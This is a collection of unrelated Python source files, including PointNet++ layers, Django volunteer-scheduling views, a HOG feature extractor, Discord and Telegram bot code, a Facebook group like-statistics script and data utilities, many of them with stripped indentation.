new_features = self.feat_mlps[k](new_features) # (1, C, M, nsample)
# multiply after mlps
new_weights = new_weights.unsqueeze(0).unsqueeze(0) # (1, 1, M, nsample)
new_features = new_weights * new_features
            new_features = F.max_pool2d(
                new_features, kernel_size=[1, new_features.size(3)]
            ).squeeze(dim=-1)  # (1, C, M1 + M2 ...)
            new_features = new_features.squeeze(dim=0).permute(1, 0)  # (M1 + M2 ..., C)
            new_features_list.append(new_features)
        new_features = torch.cat(new_features_list, dim=1)  # (M1 + M2 ..., C)
return new_xyz, new_features
class StackPointnetFPModule(nn.Module):
def __init__(self, *, mlp: List[int]):
"""
Args:
mlp: list of int
"""
super().__init__()
shared_mlps = []
for k in range(len(mlp) - 1):
shared_mlps.extend([
nn.Conv2d(mlp[k], mlp[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp[k + 1]),
nn.ReLU()
])
self.mlp = nn.Sequential(*shared_mlps)
def forward(self, unknown, unknown_batch_cnt, known, known_batch_cnt, unknown_feats=None, known_feats=None):
"""
Args:
unknown: (N1 + N2 ..., 3)
known: (M1 + M2 ..., 3)
unknow_feats: (N1 + N2 ..., C1)
known_feats: (M1 + M2 ..., C2)
Returns:
new_features: (N1 + N2 ..., C_out)
"""
dist, idx = pointnet2_utils.three_nn(unknown, unknown_batch_cnt, known, known_batch_cnt)
dist_recip = 1.0 / (dist + 1e-8)
norm = torch.sum(dist_recip, dim=-1, keepdim=True)
weight = dist_recip / norm
interpolated_feats = pointnet2_utils.three_interpolate(known_feats, idx, weight)
if unknown_feats is not None:
new_features = torch.cat([interpolated_feats, unknown_feats], dim=1) # (N1 + N2 ..., C2 + C1)
else:
new_features = interpolated_feats
new_features = new_features.permute(1, 0)[None, :, :, None] # (1, C, N1 + N2 ..., 1)
new_features = self.mlp(new_features)
new_features = new_features.squeeze(dim=0).squeeze(dim=-1).permute(1, 0) # (N1 + N2 ..., C)
return new_features
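# Interpolation note: the weights above implement inverse-distance weighting over the
# three nearest neighbours, weight_i = (1 / (d_i + 1e-8)) / sum_j (1 / (d_j + 1e-8)),
# so closer known points contribute more to each interpolated feature.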
|
55796
|
from . import _compressor
from . import bzip2
from . import gzip
from . import lzma
from . import zlib
|
55809
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.db.models import Count, Sum, F, Func
from datetime import datetime
import json
from postgresqleu.util.db import exec_to_dict
from postgresqleu.util.request import get_int_or_error
from .models import ConferenceRegistration
from .models import VolunteerSlot, VolunteerAssignment
from .util import send_conference_notification_template, get_conference_or_404
def _check_admin(request, conference):
if request.user.is_superuser:
return True
else:
return conference.administrators.filter(pk=request.user.id).exists() or conference.series.administrators.filter(pk=request.user.id).exists()
def _get_conference_and_reg(request, urlname):
conference = get_conference_or_404(urlname)
is_admin = _check_admin(request, conference)
if is_admin:
reg = ConferenceRegistration.objects.get(conference=conference, attendee=request.user)
else:
try:
reg = conference.volunteers.get(attendee=request.user)
except ConferenceRegistration.DoesNotExist:
raise Http404("Volunteer entry not found")
return (conference, is_admin, reg)
def send_volunteer_notification(conference, assignment, subject, template):
if not conference.notifyvolunteerstatus:
return
# No filter aggregates in our version of Django, so direct SQL it is
pending = exec_to_dict("SELECT count(*) FILTER (WHERE NOT org_confirmed) AS admin, count(*) FILTER (WHERE NOT vol_confirmed) AS volunteer FROM confreg_volunteerassignment a INNER JOIN confreg_volunteerslot s ON s.id=a.slot_id WHERE s.conference_id=%(confid)s", {
'confid': conference.id,
})[0]
send_conference_notification_template(
conference,
subject,
'confreg/mail/{}'.format(template), {
'conference': conference,
'assignment': assignment,
'pending': pending,
},
)
def _get_volunteer_stats(conference):
stats = ConferenceRegistration.objects.filter(conference=conference) \
.filter(volunteers_set=conference) \
.annotate(num_assignments=Count('volunteerassignment')) \
.annotate(total_time=Sum(Func(
Func(F('volunteerassignment__slot__timerange'), function='upper'),
Func(F('volunteerassignment__slot__timerange'), function='lower'),
function='age'))) \
.order_by('lastname', 'firstname')
return [{
'name': r.fullname,
'count': r.num_assignments,
'time': str(r.total_time or '0:00:00'),
} for r in stats]
def _slot_return_data(slot):
return {
'id': slot.id,
'max_staff': slot.max_staff,
'min_staff': slot.min_staff,
'assignments': [{
'id': a.id,
'volid': a.reg.id,
'volunteer': a.reg.fullname,
'vol_confirmed': a.vol_confirmed,
'org_confirmed': a.org_confirmed,
} for a in slot.volunteerassignment_set.all()],
}
@login_required
@transaction.atomic
def volunteerschedule_api(request, urlname, adm=False):
try:
(conference, can_admin, reg) = _get_conference_and_reg(request, urlname)
except ConferenceRegistration.DoesNotExist:
raise PermissionDenied()
is_admin = can_admin and adm
if request.method == 'GET':
# GET just always returns the complete volunteer schedule
slots = VolunteerSlot.objects.prefetch_related('volunteerassignment_set', 'volunteerassignment_set__reg').filter(conference=conference)
return HttpResponse(json.dumps({
'slots': [_slot_return_data(slot) for slot in slots],
'volunteers': [{
'id': vol.id,
'name': vol.fullname,
} for vol in conference.volunteers.all().order_by('firstname', 'lastname')],
'meta': {
'isadmin': is_admin,
'regid': reg.id,
},
'stats': _get_volunteer_stats(conference),
}), content_type='application/json')
if request.method != 'POST':
raise Http404()
if 'op' not in request.POST:
raise Http404()
slotid = get_int_or_error(request.POST, 'slotid')
volid = get_int_or_error(request.POST, 'volid')
# We should always have a valid slot
slot = get_object_or_404(VolunteerSlot, conference=conference, pk=slotid)
err = None
if request.POST['op'] == 'signup':
if volid != 0:
raise PermissionDenied("Invalid post data")
err = _signup(request, conference, reg, is_admin, slot)
elif request.POST['op'] == 'remove':
err = _remove(request, conference, reg, is_admin, slot, volid)
elif request.POST['op'] == 'confirm':
err = _confirm(request, conference, reg, is_admin, slot, volid)
elif request.POST['op'] == 'add':
err = _add(request, conference, reg, is_admin, slot, volid)
else:
raise Http404()
if err:
return HttpResponse(
json.dumps({'err': err}),
content_type='application/json',
status=500,
)
    # Re-query the database to pick up any changes, and return the complete object
slot = VolunteerSlot.objects.prefetch_related('volunteerassignment_set', 'volunteerassignment_set__reg').filter(conference=conference, pk=slot.pk)[0]
return HttpResponse(json.dumps({
'err': None,
'slot': _slot_return_data(slot),
'stats': _get_volunteer_stats(conference),
}), content_type='application/json')
@login_required
def volunteerschedule(request, urlname, adm=False):
try:
(conference, can_admin, reg) = _get_conference_and_reg(request, urlname)
except ConferenceRegistration.DoesNotExist:
return HttpResponse("Must be registered for conference to view volunteer schedule")
is_admin = can_admin and adm
slots = VolunteerSlot.objects.filter(conference=conference).order_by('timerange', 'title')
return render(request, 'confreg/volunteer_schedule.html', {
'basetemplate': is_admin and 'confreg/confadmin_base.html' or 'confreg/volunteer_base.html',
'conference': conference,
'admin': is_admin,
'can_admin': can_admin,
'reg': reg,
'slots': slots,
'helplink': 'volunteers',
})
def _signup(request, conference, reg, adm, slot):
if VolunteerAssignment.objects.filter(slot=slot, reg=reg).exists():
return "Already a volunteer for selected slot"
elif slot.countvols >= slot.max_staff:
return "Volunteer slot is already full"
elif VolunteerAssignment.objects.filter(reg=reg, slot__timerange__overlap=slot.timerange).exists():
return "Cannot sign up for an overlapping slot"
else:
a = VolunteerAssignment(slot=slot, reg=reg, vol_confirmed=True, org_confirmed=False)
a.save()
send_volunteer_notification(conference, a, 'Volunteer signed up', 'admin_notify_volunteer_signup.txt')
def _add(request, conference, reg, adm, slot, volid):
addreg = get_object_or_404(ConferenceRegistration, conference=conference, id=volid)
if VolunteerAssignment.objects.filter(slot=slot, reg=addreg).exists():
return "Already a volunteer for selected slot"
elif slot.countvols >= slot.max_staff:
return "Volunteer slot is already full"
elif VolunteerAssignment.objects.filter(reg=addreg, slot__timerange__overlap=slot.timerange).exists():
return "Cannot add to an overlapping slot"
else:
VolunteerAssignment(slot=slot, reg=addreg, vol_confirmed=False, org_confirmed=True).save()
def _remove(request, conference, reg, is_admin, slot, aid):
if is_admin:
a = get_object_or_404(VolunteerAssignment, slot=slot, id=aid)
else:
a = get_object_or_404(VolunteerAssignment, slot=slot, reg=reg, id=aid)
if a.org_confirmed and not is_admin:
return "Cannot remove a confirmed assignment. Please contact the volunteer schedule coordinator for manual processing."
else:
a.delete()
def _confirm(request, conference, reg, is_admin, slot, aid):
if is_admin:
# Admins can make organization confirms
a = get_object_or_404(VolunteerAssignment, slot=slot, id=aid)
if a.org_confirmed:
return "Assignment already confirmed"
else:
a.org_confirmed = True
a.save()
else:
# Regular users can confirm their own sessions only
a = get_object_or_404(VolunteerAssignment, slot=slot, reg=reg, id=aid)
if a.vol_confirmed:
return "Assignment already confirmed"
else:
a.vol_confirmed = True
a.save()
send_volunteer_notification(conference, a, 'Volunteer slot confirmed', 'admin_notify_volunteer_confirmed.txt')
def ical(request, urlname, token):
conference = get_conference_or_404(urlname)
reg = get_object_or_404(ConferenceRegistration, regtoken=token)
assignments = VolunteerAssignment.objects.filter(reg=reg).order_by('slot__timerange')
resp = render(request, 'confreg/volunteer_schedule.ical', {
'conference': conference,
'assignments': assignments,
'now': datetime.utcnow(),
}, content_type='text/calendar')
resp['Content-Disposition'] = 'attachment; filename="{}_volunteer.ical"'.format(conference.urlname)
return resp
|
55826
|
import numpy as np
from PIL import Image
from skimage import color
from skimage.feature import hog
from pelops.features.feature_producer import FeatureProducer
class HOGFeatureProducer(FeatureProducer):
def __init__(self, chip_producer, image_size=(224,224), cells=(16, 16), orientations=8, histogram_bins_per_channel=256):
self.image_size = image_size
self.cells = cells
self.orientations = orientations
self.histogram_bins_per_channel = histogram_bins_per_channel
super().__init__(chip_producer)
def produce_features(self, chip):
"""Takes a chip object and returns a feature vector of size
self.feat_size. """
img = self.get_image(chip)
img = img.resize(self.image_size, Image.BICUBIC)
img_x, img_y = img.size
# Calculate histogram of each channel
channels = img.split()
hist_features = np.full(shape=3 * self.histogram_bins_per_channel, fill_value=-1)
# We expect RGB images. If something else is passed warn the user and
# continue.
if len(channels) < 3:
            print("Non-RGB image! Vector will be padded with -1!")
        if len(channels) > 3:
            print("Non-RGB image! Channels beyond the first three will be ignored!")
            channels = channels[:3]
for i, channel in enumerate(channels):
channel_array = np.array(channel)
values, _ = np.histogram(channel_array.flat, bins=self.histogram_bins_per_channel)
start = i * self.histogram_bins_per_channel
end = (i+1) * self.histogram_bins_per_channel
hist_features[start:end] = values
# Calculate HOG features, which require a grayscale image
img = color.rgb2gray(np.array(img))
features = hog(
img,
orientations=self.orientations,
            pixels_per_cell=(img_x // self.cells[0], img_y // self.cells[1]),
cells_per_block=self.cells, # Normalize over the whole image
)
return np.concatenate((features, hist_features))
def set_variables(self):
hog_size = self.cells[0] * self.cells[1] * self.orientations
hist_size = 3 * self.histogram_bins_per_channel
self.feat_size = hog_size + hist_size
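        # Worked size check: with the defaults (cells=(16, 16), orientations=8,
        # histogram_bins_per_channel=256) this is 16*16*8 + 3*256 = 2048 + 768 = 2816.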
|
55846
|
import aiohttp
import discord
from discord.ext import commands
class Silphroad(commands.Cog):
"""
Commands related to Silphroad.
"""
def __init__(self, bot):
self.bot = bot
@commands.command(
aliases=["Silphcard", "Scard", "scard", "s-card", "S-card", "silph", "Silph", "Silphroad", "silphroad"])
async def silphcard(self, ctx, name: str):
"""
Shows information of a players silphcard.
Example: *!silphcard trnrtipsnick*
"""
await ctx.message.delete()
async with aiohttp.ClientSession() as client_session:
async with client_session.get(f"https://sil.ph/{name}.json") as response:
json = await response.json()
try:
json = json['data']
except:
embed = discord.Embed(title=f"Error", description=f"{json['error']}",
color=discord.Colour.dark_red())
                    await ctx.send(embed=embed, delete_after=10)
return
username = json['in_game_username']
title = json['title']
playstyle = json['playstyle']
goal = json['goal']
team = json['team']
trainer_level = json['trainer_level']
nest_migrations = json['nest_migrations']
avatar_url = json['avatar']
joined = json['joined']
total_xp = json['xp']
home_region = json['home_region']
pokedex_count = json['pokedex_count']
raid_average = json['raid_average']
handshakes = json['handshakes']
checkins = len(json['checkins'])
badges = json['badges']
edited = json['modified']
top_6_pokemon_id = json['top_6_pokemon']
top_6_pokemon_name = ""
try:
for pokemon_id in top_6_pokemon_id:
pokemon_name = await self.bot.get_cog("Utils").get_pokemon_name("%03d" % ((pokemon_id),))
top_6_pokemon_name += "► " + pokemon_name + "\n"
# No favorite mons
except:
pass
embed = discord.Embed(title=f"{title} {username} in {home_region}", description=f"{playstyle}, {goal}",
color=discord.Colour.orange())
embed.add_field(name=":iphone: In-Game",
value=f"**► Level:** {trainer_level}\n**► Team:** {team}\n**► Pokedex:** {pokedex_count}\n**► XP:** {total_xp}\n**► Raids:** ~{raid_average} per week\n\u200b",
inline=True)
embed.add_field(name=":trophy: Silphroad",
value=f"**► Badges:** {len(badges)}\n**► Check-Ins:** {checkins}\n**► Handshakes:** {handshakes}\n**► Joined:** {joined[:10]}\n**► Nest-Migrations:** {nest_migrations}\n\u200b",
inline=True)
embed.add_field(name=":heartpulse: Favourite Pokémon", value=f"{top_6_pokemon_name}\n\u200b", inline=True)
embed.add_field(name=":military_medal: Latest Badge", value=f"► {badges[-1]['Badge']['name']}\n\u200b",
inline=False)
embed.set_thumbnail(url=avatar_url)
embed.set_image(url=f"{badges[-1]['Badge']['image']}")
embed.set_footer(text=f"The Silph Road ▪ Last edit {edited}",
icon_url="https://assets.thesilphroad.com/img/snoo_sr_icon.png")
await ctx.message.channel.send(embed=embed)
def setup(bot):
bot.add_cog(Silphroad(bot))
|
55860
|
import pytest
@pytest.fixture
def board():
return [
[1, 1, 0],
[0, 1, 0],
[1, 1, 1]
]
@pytest.fixture
def board_mirrored():
return [
[0, 1, 1],
[0, 1, 0],
[1, 1, 1]
]
def complete_column(board, column):
return all(row[column] for row in board)
def complete_row(board, row):
return all(board[row])
def complete_diagonal(board, row, column):
size = len(board) # assume square board
if row == column:
return all(board[i][i] for i in range(size))
elif row == (size - column - 1):
return all(board[i][size - i - 1] for i in range(size))
def test_complete_column(board):
assert complete_column(board, 1)
def test_complete_column_false(board):
assert not complete_column(board, 2)
def test_complete_row(board):
assert complete_row(board, 2)
def test_complete_row_false(board):
assert not complete_row(board, 1)
def test_complete_diagonal(board):
assert complete_diagonal(board, 1, 1)
def test_complete_diagonal_mirrored(board_mirrored):
assert complete_diagonal(board_mirrored, 1, 1)
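# Extra sketch (not in the original file): complete_diagonal returns None, which is
# falsy, when (row, column) lies on neither diagonal.
def test_complete_diagonal_off_diagonal_is_falsy(board):
    assert not complete_diagonal(board, 0, 1)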
|
55880
|
import json
import os
import time
def get_cache_path():
home = os.path.expanduser("~")
return home + '/package_list.cdncache'
def time_has_passed(last_time, time_now):
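    """Return True when more than `time_now` seconds have elapsed since the epoch
    timestamp `last_time`, or when either value is None (cache never written)."""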
time_is_blank = time_now is None or last_time is None
if time_is_blank:
return time_is_blank
time_difference = int(time.time()) - int(last_time)
time_has_passed = time_difference > int(time_now)
print(time_difference)
print(time_has_passed)
return time_has_passed
def get_package_list(path):
packageList = {}
with open(path, 'r') as f:
packageList = json.loads(f.read())
return packageList
def set_package_list(path, packageList):
with open(path, 'w') as f:
f.write(json.dumps(packageList))
|
55896
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from torch.utils.data.sampler import BatchSampler
from .weight import WeightSampler
def get_batch(dataset, config):
# (sampler, batch_size, drop_last):
return None
def get_weight(dataset, config):
return WeightSampler(dataset, [config.train.batch_size.batch1, config.train.batch_size.batch2])
def get_sampler(dataset, config):
f = globals().get('get_'+config.data.sampler)
return f(dataset, config)
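# Dispatch note: get_sampler resolves 'get_' + config.data.sampler against this
# module's globals, so config.data.sampler == 'weight' calls get_weight above and
# 'batch' calls get_batch.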
|
55914
|
from Queue import Queue # Threadsafe queue for threads to use
from collections import Counter # To count stuff for us
import datetime # Because datetime printing is hard
from pprint import pprint
import time # Should be obvious
import subprocess # Used to send notifications on mac
import sys # Get system info
import threading # Should be obvious
import json # Also obvious
# FB API wrapper ("pip install facebook-sdk")
import facebook
__author__ = '<NAME>'
appeared = dict()
# For printing pretty colors in terminal
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If you're on mac, install terminal-notifier ("brew install terminal-notifier")
# to get nifty notifications when it's done
def notify_mac():
if sys.platform == "darwin":
try:
subprocess.call(
["terminal-notifier", "-message", "Done", "-title", "FB_Bot",
"-sound", "default"])
except OSError:
print "If you have terminal-notifier, this would be a notification"
# Log message with colors
# ... I never learned the proper way to log in python
def log(message, *colorargs):
if len(colorargs) > 0:
print colorargs[0] + message + color.END
else:
print message
# Junk method used for testing
def test():
log("Test")
# Export method, receives a jsonObj of style {"label": dictionary}
def exportData(jsonDict):
# Do stuff
print "Exported"
# print jsonDict
# Thread class. Each thread gets all the data from a certain date range
class RequestThread(threading.Thread):
def __init__(self, queue, apikey, query, curr_time, num_weeks):
# Super class
threading.Thread.__init__(self)
# Queue object given from outside. Queues are threadsafe
self.queue = queue
# Graph object for our call, authenticated with a token
self.graph = facebook.GraphAPI(apikey)
# FQL query with specified date range
self.input_query = query
# Counters. t-total, p-posts, c-comments
self.tcounter = Counter()
self.pcounter = Counter()
self.ccounter = Counter()
self.tpcounter = Counter()
self.tccounter = Counter()
self.cccounter = Counter()
# Time range, for logging
self.time_range = datetime.datetime.fromtimestamp(
curr_time - num_weeks).strftime('%Y-%m-%d') + "-" + \
datetime.datetime.fromtimestamp(curr_time).strftime(
'%Y-%m-%d')
# Main runner
def run(self):
log("\t(" + self.time_range + ') - Getting posts...')
# Get group posts
try:
group_posts = self.graph.fql(query=self.input_query)
except facebook.GraphAPIError as e:
# 99% of the time this is just an expired API access token
log("Error: " + str(e), color.RED)
sys.exit()
log("\t(" + self.time_range + ") - " +
str(len(group_posts)) + " posts")
# Iterate over posts
if len(group_posts) != 0:
for post in group_posts:
comments_query = \
"SELECT fromid, likes, id, time FROM comment WHERE post_id="
                # Track the earliest time this actor has posted
if post['actor_id'] in appeared.keys():
if appeared[post['actor_id']] > int(post['created_time']):
appeared[post['actor_id']] = int(post['created_time'])
else:
appeared[post['actor_id']] = int(post['created_time'])
# Add post's like count to that user in our total_likes_counter
self.tcounter[post['actor_id']] += post[
'like_info']['like_count']
# Add to top like posts counter
self.pcounter[post['post_id']] = post['like_info'][
'like_count']
# Timestamp of post by
day_timestamp = datetime.datetime.fromtimestamp(int(post['created_time']))
day_timestamp = day_timestamp.replace(hour=0, minute=0, second=0, microsecond=0)
day_timestamp = (day_timestamp - datetime.datetime(1970, 1, 1)).total_seconds()
# Add to post count
self.tpcounter[str(day_timestamp)] += 1
# Initialize controversial counter
self.cccounter[post['post_id']] += 1
# Get likes on comments
comments = self.graph.fql(
comments_query + "\"" + str(post['post_id']) +
"\" LIMIT 350")
# Iterate over comments
if len(comments) != 0:
log("\t(" + self.time_range + ") - " + str(
len(comments)) + " comments")
log("\t(" + self.time_range + ') - Getting comments...')
for c in comments:
# add their like counts to their respective users
# in our total_likes_counter
self.tcounter[c['fromid']] += c['likes']
# add like count to top_comments_likes_counter
self.ccounter[c['id']] = c['likes']
# Add to comment count
self.tccounter[str(day_timestamp)] += 1
# Add to controversial counter
self.cccounter[post['post_id']] += 1
                        # Track the earliest time this commenter has appeared
if c['fromid'] in appeared.keys():
if appeared[c['fromid']] > int(c['time']):
appeared[c['fromid']] = int(c['time'])
else:
appeared[c['fromid']] = int(c['time'])
else:
log("\tNo comments from this post")
else:
log("\tNo posts from this time frame")
self.queue.put({'t': self.tcounter, 'p': self.pcounter, 'c':
self.ccounter, 'tp': self.tpcounter,
'tc': self.tccounter, 'cc': self.cccounter})
# Method for counting various total likes in a group
def count_group_likes():
# Access token can be obtained by doing the following:
# - Log into facebook
# - Go to this url: https://developers.facebook.com/tools/explorer
fb_API_access_token = "token_goes_here"
# Only necessary if you want to get an extended access token
# You'll have to make a facebook app and generate a token with it
# You'll also need to get the following two values from it
fb_app_id = "id_goes_here"
fb_secret_key = "key_goes_here"
# Counter object to do the counting for us
total_likes_counter = Counter()
top_liked_posts_counter = Counter()
top_liked_comments_counter = Counter()
total_posts_counter = Counter()
total_comments_counter = Counter()
most_discussed_counter = Counter()
group_id = "id_goes_here" # Unique ID of the group to search.
num_of_items_to_return = 30 # Return the top ____ most liked ____
# Put the number of weeks you want it to increment by each time
# smaller is better, but too small and you could hit your rate limit
# ... which is 600 calls per 600 seconds. Maybe apps get more
num_weeks = int("2")
# Convert to unix time
num_weeks_unix = num_weeks * 604800
# Start date, in unix time (our group was made 2/13/12)
# You can use this to convert: http://goo.gl/4QMFbW
start_date = int("start_date_goes_here")
datetime_start_date = datetime.datetime.fromtimestamp(start_date)
# Query strings for FQL
posts_query = \
"SELECT post_id, like_info, actor_id, created_time FROM stream" + \
" WHERE source_id=" + group_id + " AND created_time<"
person_query = "SELECT first_name, last_name FROM user WHERE uid="
# Authorize our API wrapper
graph = facebook.GraphAPI(fb_API_access_token)
# Code to programatically extend key
if extend_key:
result = graph.extend_access_token(fb_app_id, fb_secret_key)
new_token = result['access_token']
new_time = int(result['expires']) + time.time()
# This will print out new extended token and new expiration date
# Copy them and replace your token above with this one
print 'New token: ' + new_token
print 'New expiration date: ' + datetime.datetime.fromtimestamp(
new_time).strftime('%Y-%m-%d %H:%M:%S')
log('Getting group posts', color.BLUE)
# Send end time to current time and work backward
end_time = int(time.time())
# Or manually set end time
# end_time = <end_time>
log('Current date is: ' + datetime.datetime.fromtimestamp(
end_time).strftime('%Y-%m-%d'))
log('Incrementing by ' + str(num_weeks) + ' weeks at a time')
# List of thread objects
threads = []
# Threadsafe queue for the threads to dump their data in
final_queue = Queue()
log("Initializing threads...", color.BLUE)
# While loop that creates the threads
# Instantiates each thread with calculated time, keeps decrementing to
# start
while end_time > start_date:
# New query
new_query = posts_query + str(
end_time) + " AND created_time>" + \
str(end_time - num_weeks_unix) + " LIMIT 600"
# Thread creation
t = RequestThread(final_queue, fb_API_access_token, new_query,
end_time, num_weeks_unix)
# Add it to our list
threads.append(t)
# Decrement the time
end_time -= num_weeks_unix
# Start the thread
t.start()
log("Joining threads...", color.BLUE)
# Wait for all the threads to finish before counting everything up
for t in threads:
t.join()
log("Done, merging data...", color.BLUE)
# Count up all the data by merging all the counters from each thread result
for stuff in list(final_queue.queue):
total_likes_counter += stuff['t']
top_liked_posts_counter += stuff['p']
top_liked_comments_counter += stuff['c']
total_posts_counter += stuff['tp']
total_comments_counter += stuff['tc']
most_discussed_counter += stuff['cc']
most_active_day_counter = total_posts_counter + total_comments_counter
# Returns key-value list of most liked people
most_common_people = total_likes_counter.most_common(
num_of_items_to_return)
top_posts = top_liked_posts_counter.most_common(num_of_items_to_return)
top_comments = top_liked_comments_counter.most_common(
num_of_items_to_return)
total_posts = total_posts_counter.most_common(num_of_items_to_return)
total_comments = total_comments_counter.most_common(num_of_items_to_return)
most_active_days = most_active_day_counter.most_common(num_of_items_to_return)
most_discussed = most_discussed_counter.most_common(num_of_items_to_return)
top_people_stats = []
# Iterate over top people and retrieve names from their ID's
# Use enumerate to keep track of indices for rank numbers
log('\nPeople Stats', color.BOLD)
log("* = Weighted average calc'd from user's first post date")
for i, x in enumerate(most_common_people):
person = graph.fql(person_query + str(x[0]))[0]
now = datetime.datetime.now()
join_date = datetime.datetime.fromtimestamp(appeared[x[0]])
diff1 = now - datetime_start_date
diff2 = now - join_date
avg = x[1] / (diff1.total_seconds()/60/60/24/7)
weighted_avg = x[1] / (diff2.total_seconds()/60/60/24/7)
top_people_stats.append({
"name": person['first_name'] + " " + person['last_name'],
"likes": x[1],
"avg": avg,
"augmented_avg": weighted_avg,
"first": int((join_date - datetime.datetime(1970, 1, 1)).total_seconds())
})
print '#' + str(i+1) + '. ' + person['first_name'] + " " + person['last_name']
print '-- Likes: ' + str(x[1])
print '-- Weekly average: ' + str(avg)
print '-- Weekly average*: ' + str(weighted_avg)
print '-- First post: ' + join_date.strftime('%Y-%m-%d')
# Iterate over top posts and get info
log('\nTop posts!', color.BOLD)
for x in top_posts:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
# Iterate over top comments and get info
log('\nTop comments!', color.BOLD)
for x in top_comments:
comment = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + comment['from']['name']
print s
if 'message' in comment:
c = str(comment['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(c) > 70:
print '-- ' + c[0:70] + "..."
else:
print '-- ' + c
print '-- http://www.facebook.com/' + comment['id']
# Iterate over total posts/comments and calculate info
log('\nMost active days (by number of posts and comments)', color.BOLD)
for x in most_active_days:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total posts and calculate info
log('\nMost active days (by number of posts)', color.BOLD)
for x in total_posts:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total comments and calculate info
log('\nMost active days (by number of comments)', color.BOLD)
for x in total_comments:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over top posts and get info
log('\nMost discussed', color.BOLD)
for x in most_discussed:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
log('\nExporting...', color.BLUE)
dataDict = json.dumps({"top_people_stats": top_people_stats,
"top_liked_posts_counter": top_liked_posts_counter,
"top_liked_comments_counter": top_liked_comments_counter,
"total_posts_counter": total_posts_counter,
"total_comments_counter": total_comments_counter,
"most_active_day_counter": most_active_day_counter,
"most_common_people": most_common_people,
"top_posts": top_posts,
"top_comments": top_comments,
"total_posts": total_posts,
"total_comments": total_comments,
"most_active_days": most_active_days})
exportData(dataDict)
args = sys.argv
extend_key = False # boolean for if we want to extend token access
if len(args) > 1:
if "--extend" in args: # Pass in flag
extend_key = True
if "test" in args:
test()
sys.exit()
else:
log('No args specified')
count_group_likes()
notify_mac()
|
55916
|
from telegram.ext import Updater, CommandHandler, RegexHandler, MessageHandler, Filters, CallbackQueryHandler
from config import settings, command as cmd
from src import bot
import logging
updater = Updater(token=settings.BOT_TOKEN)
dispatcher = updater.dispatcher
bot = bot.ScheduleBot()
# ********* BASE DISPATCH *********
start_hand = CommandHandler(cmd.START, bot.menu_before_register)
dispatcher.add_handler(start_hand)
main_menu_hand = RegexHandler(cmd.MAIN_MENU, bot.menu_after_register)
dispatcher.add_handler(main_menu_hand)
# ********* AFTER REGISTER DISPATCH *********
today_hand = RegexHandler(cmd.TODAY, bot.get_today)
dispatcher.add_handler(today_hand)
tomorrow_hand = RegexHandler(cmd.TOMORROW, bot.get_tomorrow)
dispatcher.add_handler(tomorrow_hand)
two_day_hand = RegexHandler(cmd.DAY_AFTER_TOMORROW, bot.get_day_after_tomorrow)
dispatcher.add_handler(two_day_hand)
week_hand = RegexHandler(cmd.WEEK, bot.get_week)
dispatcher.add_handler(week_hand)
two_week_hand = RegexHandler(cmd.TWO_WEEK, bot.get_two_week)
dispatcher.add_handler(two_week_hand)
# ********* BEFORE REGISTER DISPATCH *********
about_bot_hand = RegexHandler(cmd.ABOUT_BOT, bot.about)
dispatcher.add_handler(about_bot_hand)
call_back_handler = CallbackQueryHandler(bot.init_search_field)
dispatcher.add_handler(call_back_handler)
register_hand = MessageHandler(Filters.text, bot.register)
dispatcher.add_handler(register_hand)
# ********* ADMIN DISPATCH *********
admin_hand = CommandHandler(cmd.ADMIN_PANEL, bot.admin_panel)
dispatcher.add_handler(admin_hand)
get_my_id = CommandHandler(cmd.GET_MY_ID, bot.get_my_id)
dispatcher.add_handler(get_my_id)
# ========== LOGGING ==========
if settings.LOGGING_ENABLE:
    logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
                        level=logging.INFO)
logger = logging.getLogger(__name__)
def error(bot, update, error):
    logger.warning('Update "%s" caused error "%s"', update, error)
dispatcher.add_error_handler(error)
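# If this module is run as the entry point, a typical launch for this pre-v13
# python-telegram-bot API would be long polling; sketched here as an assumption:
# updater.start_polling()
# updater.idle()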
|
55918
|
import os
import h5py
import numpy as np
import pandas as pd
import multiprocessing as mp
class Scaler:
def __init__(self, mean=None, std=None):
self.mean = mean
self.std = std
def fit(self, data):
self.mean = np.mean(data)
self.std = np.std(data)
def set_mean(self, mean):
self.mean = mean
def set_std(self, std):
self.std = std
def transform(self, data):
return (data - self.mean) / self.std
def inverse_transform(self, data):
return data * self.std + self.mean
def load_h5(filename, keywords):
f = h5py.File(filename, 'r')
data = []
for name in keywords:
data.append(np.array(f[name]))
f.close()
if len(data) == 1:
return data[0]
return data
def write_h5(filename, d):
f = h5py.File(filename, 'w')
for key, value in d.items():
f.create_dataset(key, data=value)
f.close()
def from_str_to_np(s):
arr = np.fromstring(s, dtype=np.int32, sep=',')
arr = arr.reshape(-1, 3)
return arr
def load_trajectory(filename):
with open(filename) as f:
lines = f.readlines()
pool = mp.Pool()
trajectory = pool.map(from_str_to_np, lines)
return trajectory
def fill_missing(data):
T, N, D = data.shape
data = np.reshape(data, (T, N * D))
df = pd.DataFrame(data)
df = df.fillna(method='pad')
df = df.fillna(method='bfill')
data = df.values
data = np.reshape(data, (T, N, D))
